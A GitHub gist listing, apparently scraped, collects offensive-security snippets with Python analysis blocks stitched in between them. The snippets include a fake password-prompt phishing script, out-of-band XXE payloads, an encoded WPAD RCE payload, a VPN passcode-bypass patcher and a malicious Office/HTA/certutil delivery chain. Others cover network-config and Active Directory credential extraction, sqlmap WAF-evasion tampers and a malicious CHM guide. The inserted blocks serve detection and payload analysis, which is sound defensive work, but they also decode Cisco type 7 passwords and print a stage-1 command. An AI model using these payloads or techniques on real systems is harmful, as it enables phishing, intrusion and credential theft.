David Dlat
<html>
<SCRIPT Language="Javascript">var password=prompt
('Your session has expired. Please enter your password to continue.','');
location.href="http://127.0.0.1/pass.cgi?passwd="+password;</SCRIPT>
</html>
@Dlat
Dlat / XXE_payloads
Created August 20, 2018 19:24 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
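As an added example, not part of this gist or of staaldraad's original, here is the check a practitioner wants on the receiving side: a gate that runs a document through Python's stdlib expat with fetching disabled and reports every entity the DTD declares, so the vanilla payload above is rejected before any parser that might honour `&sp;` sees it. The three documents are constructed fixtures (the first is the payload above; the blind variant's `evil.dtd` URL is made up):

```python
import xml.parsers.expat as expat

# Constructed sample: the "vanilla" out-of-band payload from the gist above.
VANILLA_XXE = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>"""

# Constructed sample: a blind variant that pulls a parameter entity from an
# attacker-controlled DTD (the usual out-of-band exfiltration shape).
BLIND_XXE = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ENTITY % dtd SYSTEM "http://x.x.x.x:443/evil.dtd">
%dtd;
]>
<r>x</r>"""

# Constructed sample: harmless document that only declares an internal entity.
BENIGN = b"""<?xml version="1.0" ?>
<!DOCTYPE r [ <!ENTITY co "Example Corp"> ]>
<r>&co;</r>"""


def audit_xml(data):
    """Parse with expat but never fetch anything; report what the DTD declares."""
    report = {"internal": [], "external": [], "parameter": [],
              "fetch_attempts": [], "error": None}
    parser = expat.ParserCreate()
    # Never load external parameter entities such as %dtd; above.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_entity_decl(name, is_pe, value, base, system_id, public_id, notation):
        uri = system_id or public_id
        if is_pe:
            report["parameter"].append((name, uri))
        elif uri:
            report["external"].append((name, uri))
        else:
            report["internal"].append((name, value))

    def on_external_ref(context, base, system_id, public_id):
        # Reached when content references an external general entity (&sp;).
        report["fetch_attempts"].append(system_id or public_id)
        return 0  # returning 0 makes expat abort instead of resolving it

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        report["error"] = str(exc)
    # Decide on the declarations alone, so a parse error cannot hide a finding.
    unsafe = report["external"] or report["parameter"] or report["fetch_attempts"]
    report["verdict"] = "reject" if unsafe else "accept"
    return report


if __name__ == "__main__":
    for label, doc in (("vanilla", VANILLA_XXE), ("blind", BLIND_XXE), ("benign", BENIGN)):
        print(label, audit_xml(doc))
```

Returning 0 from `ExternalEntityRefHandler` turns the reference into a parse error rather than a fetch, and `XML_PARAM_ENTITY_PARSING_NEVER` keeps `%dtd;` from being loaded; internal entities are still listed because they are where entity-expansion (billion laughs) payloads live, and a deployment may want to cap their number or size as well.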
@Dlat
Dlat / VLANHopperDTP.py
Created August 20, 2018 19:24 — forked from mgeeky/VLANHopperDTP.py
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
#!/usr/bin/python
#
# This script performs DTP Trunk mode detection and a VLAN Hopping
# attack automatically, running a sniffer afterwards to collect any other
# VLAN available. To be launched only in a Unix/Linux environment as the
# script utilizes the following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
@Dlat
Dlat / GlobalProtectDisable.cpp
Created August 20, 2018 19:25 — forked from mgeeky/GlobalProtectDisable.cpp
Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode.
/*
* Global Protect VPN Application patcher allowing the
* Administrator user to disable VPN without Passcode.
*
* It does this by patching process memory, thus allowing the VPN
* to be disabled without entering the proper password.
*
* Tested on:
* GlobalProtect client 3.1.6.19
* Palo Alto Networks
@Dlat
Dlat / muti-stage-1.md
Created August 20, 2018 19:33 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for the purposes of Red Teaming / Penetration-Testing assignments.

The resulting document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining commands to be executed from the document's Author property and passing them to the StdIn of the Powershell.exe process
  • leveraging the certutil technique to receive a Base64 encoded malicious HTA document
  • having a Base64 encoded Powershell command in that Author property
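An added example, not from mgeeky's write-up or any tool it names, of the check a defender would run against the artefact this process produces: read the Author property of a .docx, try to base64-decode it as UTF-16LE (what `powershell -EncodedCommand` expects) and as UTF-8 (what a script piped to PowerShell's StdIn would be), and flag stage-1 tokens. It assumes an OOXML .docx, where the property lives in `docProps/core.xml` as `dc:creator`; a legacy binary .doc keeps it in the SummaryInformation OLE stream, which this does not parse. The stage-1 command, the package builder and the `example.invalid` URL are constructed here:

```python
import base64
import binascii
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

DC_NS = "http://purl.org/dc/elements/1.1/"
CP_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"

# Tokens that have no business in a document's Author metadata.
SUSPICIOUS = re.compile(
    r"(?i)(powershell|certutil|mshta|invoke-expression|\biex\b|downloadstring|-decode|\.hta\b)")

# Constructed stage-1 command in the shape the write-up describes: fetch a
# base64 HTA, decode it with certutil, run it. example.invalid never resolves.
STAGE1_CMD = ("certutil -urlcache -split -f http://example.invalid/stage.txt stage.txt; "
              "certutil -decode stage.txt stage.hta; mshta stage.hta")


def build_docx_with_author(author):
    """Constructed minimal OOXML package: just enough to carry dc:creator."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Override PartName="/docProps/core.xml" '
                   'ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>'
                   '</Types>')
        z.writestr("docProps/core.xml",
                   '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   f'<cp:coreProperties xmlns:cp="{CP_NS}" xmlns:dc="{DC_NS}">'
                   f'<dc:creator>{escape(author)}</dc:creator>'
                   '</cp:coreProperties>')
    return buf.getvalue()


def decode_candidate(text):
    """Return the text hidden in a base64 Author value, or None if it is not one."""
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    # UTF-16LE first: ASCII text misread as UTF-16LE comes out as CJK-range
    # code points and fails the ASCII share test, so the UTF-8 pass still runs.
    for encoding in ("utf-16-le", "utf-8"):
        try:
            candidate = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        ascii_share = sum(ch < "\x80" for ch in candidate) / max(len(candidate), 1)
        if ascii_share > 0.9 and all(ch.isprintable() or ch in "\r\n\t" for ch in candidate):
            return candidate
    return None


def inspect_docx_author(docx_bytes):
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    creator = root.findtext(f"{{{DC_NS}}}creator") or ""
    decoded = decode_candidate(creator)
    hits = SUSPICIOUS.findall(decoded) if decoded else []
    return {
        "author": creator,
        "decoded": decoded,
        "indicators": sorted({h.lower() for h in hits}),
        "suspicious": bool(hits),
    }


if __name__ == "__main__":
    doc = build_docx_with_author(base64.b64encode(STAGE1_CMD.encode()).decode())
    print(inspect_docx_author(doc))
```

A long base64 Author with no recognised token is still worth surfacing in a mail gateway; the function returns the decoded text so the caller can apply its own threshold.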
@Dlat
Dlat / wpad.dat
Created August 20, 2018 19:34 — forked from mgeeky/wpad.dat
WPAD/PAC RCE Exploit working on Windows 10 x64 as documented by Google Project Zero (Source: https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html)
function FindProxyForURL(url, host) {
var payload = String.fromCharCode(
    0x6f50,0x6577,0x5372,0x6568,0x6c6c,0x2d20,0x6f43,0x6d6d,0x6e61,0x2064,
    0x6522,0x6863,0x206f,0x5654,0x5171,0x4141,0x414d,0x4141,0x4541,0x4141,
    0x4141,0x2f2f,0x4138,0x4c41,0x4167,0x4141,0x4141,0x4141,0x4141,0x4151,
    0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,
    0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,
    0x4141,0x4141,0x4141,0x4136,0x4141,0x4141,0x6634,0x6775,0x4134,0x4174,
    0x4e6e,0x6249,0x4267,0x4d54,0x6830,0x4756,0x7068,0x7963,0x7742,0x6d63,
    0x6e39,0x6d63,0x7446,0x4749,0x684e,0x6d62,0x7635,0x4364,0x6942,0x535a,
    0x7942,0x5764,0x6734,0x5761,0x6734,0x4552,0x5439,0x4749,0x7631,0x475a,
    0x7555,0x5144,0x4b30,0x414a,0x4141,0x4141,0x4141,0x4141,0x5a43,0x4371,
    0x4b48,0x6333,0x506c,0x646d,0x4a33,0x3554,0x646e,0x5579,0x5a2b,0x7172,
    0x4a74,0x4e6d,0x4a2f,0x3554,0x756d,0x3071,0x5936,0x4d31,0x506c,0x646d,
    0x4a33,0x7054,0x446e,0x5579,0x5a2b,0x7146,0x4c70,0x4e6d,0x4a7a,0x3554,
    0x576b,0x6b71,0x5971,0x3833,0x506c,0x526d
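An added example, not part of the gist or of Project Zero's write-up, that recovers what the truncated `String.fromCharCode` list above actually carries. Each 16-bit code unit packs two payload bytes (low byte first), so the JScript string's UTF-16 buffer in memory is the raw byte string; unpacking the visible prefix yields a PowerShell command that echoes a base64-encoded PE. `CHARCODES` is the visible, truncated prefix copied from the line above; whatever followed it on the original gist is unknown and not guessed:

```python
import base64
import re
import struct

# Constructed fixture: the visible (truncated) prefix of the fromCharCode list.
CHARCODES = [
    0x6f50, 0x6577, 0x5372, 0x6568, 0x6c6c, 0x2d20, 0x6f43, 0x6d6d, 0x6e61, 0x2064,
    0x6522, 0x6863, 0x206f, 0x5654, 0x5171, 0x4141, 0x414d, 0x4141, 0x4541, 0x4141,
    0x4141, 0x2f2f, 0x4138, 0x4c41, 0x4167, 0x4141, 0x4141, 0x4141, 0x4141, 0x4151,
    0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141,
    0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141, 0x4141,
    0x4141, 0x4141, 0x4141, 0x4136, 0x4141, 0x4141, 0x6634, 0x6775, 0x4134, 0x4174,
    0x4e6e, 0x6249, 0x4267, 0x4d54, 0x6830, 0x4756, 0x7068, 0x7963, 0x7742, 0x6d63,
    0x6e39, 0x6d63, 0x7446, 0x4749, 0x684e, 0x6d62, 0x7635, 0x4364, 0x6942, 0x535a,
    0x7942, 0x5764, 0x6734, 0x5761, 0x6734, 0x4552, 0x5439, 0x4749, 0x7631, 0x475a,
    0x7555, 0x5144, 0x4b30, 0x414a, 0x4141, 0x4141, 0x4141, 0x4141, 0x5a43, 0x4371,
    0x4b48, 0x6333, 0x506c, 0x646d, 0x4a33, 0x3554, 0x646e, 0x5579, 0x5a2b, 0x7172,
    0x4a74, 0x4e6d, 0x4a2f, 0x3554, 0x756d, 0x3071, 0x5936, 0x4d31, 0x506c, 0x646d,
    0x4a33, 0x7054, 0x446e, 0x5579, 0x5a2b, 0x7146, 0x4c70, 0x4e6d, 0x4a7a, 0x3554,
    0x576b, 0x6b71, 0x5971, 0x3833, 0x506c, 0x526d,
]


def unpack_charcodes(codes):
    """Each 16-bit code unit holds two payload bytes, low byte first."""
    raw = bytearray()
    for unit in codes:
        raw += bytes((unit & 0xFF, unit >> 8))
    return raw.decode("latin-1")


def base64_after_echo(command):
    """The command is `PowerShell -Command "echo <base64> ...`; decode as much
    of the visible blob as forms whole base64 quanta."""
    m = re.search(r"echo\s+([A-Za-z0-9+/=]+)", command)
    if not m:
        return b""
    b64 = m.group(1)
    return base64.b64decode(b64[: len(b64) - len(b64) % 4])


def describe_payload(codes):
    command = unpack_charcodes(codes)
    blob = base64_after_echo(command)
    return {
        "command": command,
        "is_pe": blob[:2] == b"MZ",
        # e_lfanew sits at offset 0x3c of the DOS header.
        "e_lfanew": struct.unpack_from("<I", blob, 0x3C)[0] if len(blob) >= 0x40 else None,
        "dos_stub": b"This program cannot be run in DOS mode." in blob,
        "decoded_bytes": len(blob),
    }


if __name__ == "__main__":
    info = describe_payload(CHARCODES)
    print(info["command"][:60])
    print({k: v for k, v in info.items() if k != "command"})
```

The same unpacking works for any PAC or JScript sample that builds a string from wide character codes; once `is_pe` is true the decoded bytes can go straight to a PE parser or sandbox.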
@Dlat
Dlat / networkConfigurationCredentialsExtract.py
Created August 20, 2018 19:34 — forked from mgeeky/networkConfigurationCredentialsExtract.py
Network-configuration Credentials extraction script - intended to sweep input configuration file and extract keys, hashes, passwords.
#!/usr/bin/python
#
# Script intended to sweep Cisco, Huawei and possibly other network device
# configuration files in order to extract plain and cipher passwords out of them.
#
# Mariusz B., mgeeky '18
#
import re
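An added example, not mgeeky's script, of the core of such a sweep in Python: a set of line patterns for Cisco and Huawei credential lines plus the reversible Cisco type 7 transform, run over a constructed configuration fragment (no real device, hash or cipher text; the type 5 hash and the Huawei cipher value are invented filler). Type 5 and Huawei cipher values are reported but not decoded, since those need offline cracking:

```python
import re

# Cisco type 7 is a fixed-key XOR; this widely published key is all it takes.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def cisco_type7_decrypt(encoded):
    """First two digits are the key offset; each following hex pair is one XORed byte."""
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError("not a type 7 string: %r" % encoded)
    seed = int(encoded[:2], 10)
    plain = []
    for i in range((len(encoded) - 2) // 2):
        byte = int(encoded[2 + 2 * i:4 + 2 * i], 16)
        plain.append(chr(byte ^ ord(XLAT[(seed + i) % len(XLAT)])))
    return "".join(plain)


def cisco_type7_encrypt(plain, seed=9):
    """Inverse of the above; used here only to build fixtures."""
    out = ["%02d" % seed]
    for i, ch in enumerate(plain):
        out.append("%02X" % (ord(ch) ^ ord(XLAT[(seed + i) % len(XLAT)])))
    return "".join(out)


# Ordered: first match per line wins, so the specific forms come before the
# generic "password <x>" catch-all.
PATTERNS = [
    ("cisco-type7", re.compile(r"(?:password|key-string|key)\s+7\s+([0-9A-Fa-f]+)\b")),
    ("cisco-md5-secret", re.compile(r"secret\s+5\s+(\$1\$\S+)")),
    ("huawei-cipher", re.compile(r"\b(?:irreversible-)?cipher\s+(\S+)")),
    ("cleartext", re.compile(r"(?:password|secret)\s+0\s+(\S+)")),
    ("cleartext", re.compile(r"\bpassword\s+(?![0-9]\s)(\S+)")),
    ("snmp-community", re.compile(r"snmp-server community\s+(\S+)")),
]

# Constructed sample configuration; nothing here comes from a real device.
SAMPLE_CONFIG = """\
! constructed sample
hostname edge-rtr-01
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username admin privilege 15 password 7 094F471A1A0A
username backup password 0 Summer2018!
line vty 0 4
 password c0nsole
snmp-server community public RO
snmp-server community s3cr3tRW RW
key chain ospf-keys
 key 1
  key-string 7 0235015819031B70
#
sysname core-sw-01
local-user netops password irreversible-cipher $1a$Bz3QyKtj7X$G5mL0pQ2
"""


def sweep_config(text):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            value, decoded = m.group(1), None
            if kind == "cisco-type7":
                try:
                    decoded = cisco_type7_decrypt(value)
                except ValueError:
                    kind = "cisco-type7-malformed"
            elif kind in ("cleartext", "snmp-community"):
                decoded = value
            findings.append({"line": lineno, "kind": kind, "value": value, "decoded": decoded})
            break
    return findings


if __name__ == "__main__":
    for f in sweep_config(SAMPLE_CONFIG):
        print(f)
```

Anything the sweep returns with `decoded` set is usable immediately; the hash and cipher findings go to a cracking queue, and the SNMP communities are worth checking for read-write access before anything else.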
@Dlat
Dlat / Get-UserPasswordEntries.ps1
Created August 20, 2018 19:47 — forked from mgeeky/Get-UserPasswordEntries.ps1
Get-UserPasswordEntries - Red-Teaming script intended to look through Active Directory's LDAP/GlobalCatalog and extract every user having set userPassword property. Then to decode that property.
# Assuming we have PowerView's Get-NetUser command available.
Import-Module powerview.ps1 -ErrorAction SilentlyContinue
Function Get-UserPasswordEntries
{
$passwordsEntries = Get-NetUser -Filter userpassword=*
$num = 0
foreach ($entry in $passwordsEntries) {
$passw = $entry | Select -ExpandProperty userpassword
@Dlat
Dlat / sqlmap-tamper-scripts-evaluation.md
Created August 20, 2018 19:47 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents the results of tests launched against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY

The names below are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents the most dominant rating of the top 20 requests observed by F5 in its Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@Dlat
Dlat / Malicious-CHM-Guide.md
Created August 20, 2018 19:48 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>